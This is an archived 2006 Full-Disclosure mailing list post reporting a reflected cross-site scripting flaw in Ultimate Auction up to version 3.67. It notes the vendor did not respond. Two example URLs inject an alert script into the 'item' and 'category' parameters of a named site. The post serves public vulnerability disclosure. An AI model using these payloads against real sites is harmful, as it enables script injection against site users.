|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-disclosure] Ultimate Auction <=3.67
From: Querkopf (druck_von_rechts
gmx.de)
Date: Sun Jan 15 2006 - 10:41:19 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hello!
I've found a XSS in Ultimate Auction <=3.67. The Vendor was informed mid
October 2005! They still haven't fix the script and doesn't reply to mails.
Here's a little Example:
http://www.ultimate-auction.de/cgi-local/auktion/item.pl/item.pl?item=<script>alert("XSS")</script>
http://www.ultimate-auction.de/cgi-local/auktion/itemlist.pl?category=<script>alert("XSS")</script>
The bug has the BID 16239
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]